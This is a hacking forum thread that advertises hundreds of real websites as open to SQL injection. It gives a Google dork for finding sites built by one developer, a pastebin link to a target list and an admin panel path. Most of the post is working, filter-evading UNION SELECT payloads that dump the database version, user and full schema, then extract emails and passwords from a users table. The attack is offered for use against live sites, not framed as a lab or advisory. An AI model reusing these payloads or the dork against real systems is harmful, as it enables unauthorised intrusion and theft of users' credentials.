Загрузка...

Hundreds of sites vulnerable to SQL hacking

Thread in Web vulnerabilities created by wwwsssaaadddw Mar 25, 2017. 369 views

  1. wwwsssaaadddw
    wwwsssaaadddw Topic starter Mar 25, 2017 4 Mar 24, 2017
    Hundreds of sites vulnerable to SQL hacking

    # Google Dork : "Designed & Developed By: SOFTECH" .php?id=

    http://pastebin.com/9Gyw6tTr


    Find a management panel
    http://www.site.ps/softpanel/

    'order by 1000-- -


    '/*!50000union*/ select 1,2,3,4,5,6,7,8,/*!00000concat*/(0x3c666f6e7420666163653d224963656c616e6422207374796c653d22636f6c6f723a7265643b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e496e6a6563746564206279207a757261656c5f73547a203c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d70696e6b2073697a653d353e44622056657273696f6e203a ,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x)),10,11,12,13,14--+-


    '/*!50000union*/ select 1,2,3,4,5,6,7,8,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(site_db.users)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,email,0x2a,password,0x3c62723e))))x),10,11,12,13,14--+-
     
Loading...
Top